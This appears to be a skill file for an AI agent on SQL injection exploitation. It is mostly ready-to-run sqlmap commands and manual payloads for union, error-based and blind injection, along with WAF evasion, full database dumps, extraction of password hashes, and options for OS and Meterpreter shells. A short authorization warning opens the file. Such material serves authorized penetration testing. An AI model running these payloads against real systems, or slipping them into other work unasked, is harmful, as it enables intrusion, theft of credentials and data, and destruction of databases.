0X6C7879/exploit-sqli

SQL Injection Detection & Exploitation

Authorization Warning

DANGER: SQL injection testing can damage or destroy data in production databases. Always ensure you have:

• Written permission from the target application owner
• Isolated testing environment
• Backups of affected systems
• Legal compliance with local regulations

Never test SQL injection on production databases without authorization.

Prerequisites

Required tools that must be installed on your system:

• sqlmap - pip install sqlmap or git clone https://github.com/sqlmapproject/sqlmap

Optional tools:

• BBQSQL - Semi-automated SQL injection tool
• NoSQLMap - NoSQL injection testing

Quick Start

Most commonly used commands for SQL injection testing:

Automated SQLMap Scan

sqlmap -u "https://target.com/page?id=1"

POST Request Testing

sqlmap -u "https://target.com/login" --data="username=admin&password=test"

Cookie Testing

sqlmap -u "https://target.com" --cookie="sessionid=abc123"

Common Scenarios

Scenario 1: Basic Parameter Testing

When you need to test a URL parameter for SQL injection:

sqlmap -u "https://target.com/page?id=1"

Parameters:

• -u - Target URL
• -p - Specific parameter to test (default: all)
• --batch - Avoid interactive prompts
• --random-agent - Use random User-Agent

Example:

sqlmap -u "https://target.com/vuln.php?id=1" --batch --random-agent

---

Scenario 2: POST Request Injection

When you need to test POST body parameters:

sqlmap -u "https://target.com/login" --data="username=admin&password=test"

From file:

sqlmap -u "https://target.com/login" -d post_data.txt

---

Scenario 3: Cookie/Header Injection

When you need to test cookies or headers:

# Cookie injection
sqlmap -u "https://target.com" --cookie="sessionid=abc123"

# User-Agent injection
sqlmap -u "https://target.com" --headers="User-Agent: sqlmap"

# Referer injection
sqlmap -u "https://target.com" --referer="https://evil.com"

Multiple headers:

sqlmap -u "https://target.com" -H "Cookie:id=1" -H "User-Agent: test"

---

Scenario 4: Specific DBMS Testing

When you know or suspect the database type:

sqlmap -u "https://target.com/page?id=1" --dbms=mysql
sqlmap -u "https://target.com/page?id=1" --dbms=postgresql
sqlmap -u "https://target.com/page?id=1" --dbms=sqlserver
sqlmap -u "https://target.com/page?id=1" --dbms=oracle

---

Scenario 5: Database Enumeration

When you need to extract database information:

# List databases
sqlmap -u "https://target.com/page?id=1" --dbs

# List tables
sqlmap -u "https://target.com/page?id=1" -D dbname --tables

# Dump table
sqlmap -u "https://target.com/page?id=1" -D dbname -T users --dump

# Dump all
sqlmap -u "https://target.com/page?id=1" --dump-all

---

Scenario 6: User Enumeration

When you need to extract user credentials:

# Enumerate database users
sqlmap -u "https://target.com/page?id=1" --users

# Extract password hashes
sqlmap -u "https://target.com/page?id=1" --passwords

# Dump users table
sqlmap -u "https://target.com/page?id=1" -D dbname -T users -C username,password --dump

---

Scenario 7: Union-Based SQL Injection

Manual testing for Union-based SQLi:

# Test for SQL injection with payload
https://target.com/page?id=1' OR '1'='1
https://target.com/page?id=1' UNION SELECT 1,2,3--
https://target.com/page?id=1' UNION SELECT NULL,version(),NULL--

Determine column count:

id=1' ORDER BY 1--
id=1' ORDER BY 2--
id=1' ORDER BY 3--

Check for string vs integer:

id=1' UNION SELECT 1,'2',3--
id=1' UNION SELECT 1,NULL,NULL--

---

Scenario 8: Error-Based SQL Injection

When error messages are displayed:

# MySQL error injection
id=1' AND extractvalue(1, concat(0x7e, database(), 0x7e))--
id=1' AND updatexml(1, concat(0x7e, database(), 0x7e), 1)--
id=1' AND exp(~(SELECT * FROM (SELECT database())a))--

# PostgreSQL error injection
id=1' AND cast(version() as int)--
id=1'; CAST(version() AS INT)--

---

Scenario 9: Blind SQL Injection

When no error messages are returned:

Boolean-based:

id=1' AND 1=1--
id=1' AND 1=2--

Time-based (MySQL):

id=1' AND SLEEP(5)--
id=1' AND BENCHMARK(5000000, MD5(1))--

Time-based (PostgreSQL):

id=1'; SELECT pg_sleep(5)--
id=1'; SELECT extract(epoch from now())-

---

Scenario 10: WAF Evasion

When WAF blocks injection attempts:

# Use tamper scripts
sqlmap -u "https://target.com/page?id=1" --tamper=space2comments

# Use random agent
sqlmap -u "https://target.com/page?id=1" --random-agent

# Different level
sqlmap -u "https://target.com/page?id=1" --level=1 --risk=1

# Specific technique
sqlmap -u "https://target.com/page?id=1" --technique=U

---

Injection Testing Workflow

1. Initial Detection

# Automated scan
sqlmap -u "https://target.com/page?id=1" --batch

# Manual quick test
curl "https://target.com/page?id=1'" | grep -i "sql\|mysql\|syntax"
curl "https://target.com/page?id=1\" OR \"1\"=\"2" | grep -i "error"

2. Confirmation

# Confirm with multiple payloads
curl "https://target.com/page?id=1 AND 1=1"
curl "https://target.com/page?id=1 AND 1=2"
curl "https://target.com/page?id=1' OR '1'='1"

3. Fingerprint Database

sqlmap -u "https://target.com/page?id=1" --current-user

4. Enumeration

# Get database info
sqlmap -u "https://target.com/page?id=1" --hostname --current-db --is-dba

# List databases
sqlmap -u "https://target.com/page?id=1" --dbs

---

SQLMap Options Reference

| Option | Description | |--------|-------------| | -u | Target URL | | -r | Parse log file | | -l | Load from file | | -m | Scan multiple targets | | -p | Test specific parameters | | --skip | Skip parameters | | --dbms | Force DBMS | | --os | Force OS | | --tamper | Tamper script | | --level | Test level (1-5) | | --risk | Risk level (1-3) | | --technique | Specific technique (B/E/U/S/T) | | --batch | Non-interactive | | --random-agent | Random User-Agent | | --proxy | Use proxy | | --delay | Delay between requests | | --timeout | Request timeout | | --retries | Retry attempts | | --string | Match string | | --not-string | Not match string | | --regexp | Regexp filter | | --grep | Regexp filter for pages | | --crawl | Crawl site | | --forms | Parse forms | | --cookie | Cookie value | | --headers | Extra headers | | --user-agent | Custom User-Agent | | --method | Force method | | --data | POST data | | -d | POST data from file | | --dbs | Enumerate databases | | --tables | Enumerate tables | | --columns | Enumerate columns | | --schema | Enumerate schema | | --dump | Dump data | | --dump-all | Dump all | | --search | Search | | --users | Enumerate DB users | | --passwords | Enumerate password hashes | | --priv-esc | Privilege escalation | | --os-shell | OS shell | | --os-pwn | Meterpreter/OBM shell | | --sql-shell | SQL shell | | --wizard | Wizard mode | | -v | Verbosity (0-6) |

---

Manual Payloads

MySQL Payloads

-- Version detection
' UNION SELECT @@version--

-- Current user
' UNION SELECT user()--

-- Current database
' UNION SELECT database()--

-- All databases
' UNION SELECT schema_name FROM information_schema.schemata--

-- Tables from database
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()--

-- Columns from table
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

-- Concatenate data
' UNION SELECT CONCAT(username,0x3a,password) FROM users--

PostgreSQL Payloads

-- Version
' UNION SELECT version()--

-- Current user
' UNION SELECT user--

-- Current database
' UNION SELECT current_database()--

-- All databases
' UNION SELECT datname FROM pg_database--

-- Tables
' UNION SELECT tablename FROM pg_tables WHERE schemaname='public'--

-- Columns
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

SQL Server Payloads

-- Version
' UNION SELECT @@version--

-- Database
' UNION SELECT DB_NAME()--

-- Tables
' UNION SELECT table_name FROM information_schema.tables--

-- Columns
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

-- Databases
' UNION SELECT name FROM master..sysdatabases--

Oracle Payloads

-- Version
' UNION SELECT banner FROM v$version--

-- Tables
' UNION SELECT table_name FROM all_tables WHERE owner=USER--

-- Columns
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--

---

Testing Checklist

• [ ] URL parameters
• [ ] POST parameters
• [ ] Cookies
• [ ] User-Agent
• [ ] Referer
• [ ] X-Forwarded-For
• [ ] Accept headers
• [ ] JSON body fields
• [ ] GraphQL queries
• [ ] API endpoints

---

Scenario: Persistent Storage of SQL Injection Findings

When you need to persist SQL injection findings to the database:

# Manual entry after discovering SQL injection
python .claude/skills/exploit-sqli/scripts/sqli_storage.py \
  --host-ip 192.168.1.100 \
  --url "https://example.com/login?id=1" \
  --parameter id \
  --payload "1' OR '1'='1" \
  --severity Critical \
  --cvss-score 9.8 \
  --db-type MySQL \
  --subsystem "Web Application"

Parameters:

• --host-ip - Target host IP (required)
• --url - Vulnerable URL (required)
• --parameter - Vulnerable parameter name (required)
• --payload - Payload used (required)
• --severity - Severity level (default: High)
• --cvss-score - CVSS score (0.0-10.0)
• --db-type - Database type (e.g., MySQL, PostgreSQL)
• --subsystem - Subsystem name (optional)
• --title - Vulnerability title (auto-generated if not specified)
• --description - Vulnerability description

Database location: ./data/results.db

Related skills: results-storage - Query data, generate reports

---

Resources

Scripts

• scripts/sqli_payload_generator.py - Generate SQL injection payloads
• scripts/boolean_sqli_tester.py - Test blind SQL injection
• scripts/response_analyzer.py - Analyze responses for injection clues

References

• references/sqlmap_guide.md - Comprehensive SQLMap reference
• references/manual_sqli_techniques.md - Manual injection techniques
• references/nosql_injection.md - NoSQL injection guide

Assets

• assets/common_error_payloads.txt - Common error-based payloads
• assets/time-based_payloads.txt - Time-based blind payloads
• assets/dbms_fingerprints.txt - Database fingerprinting patterns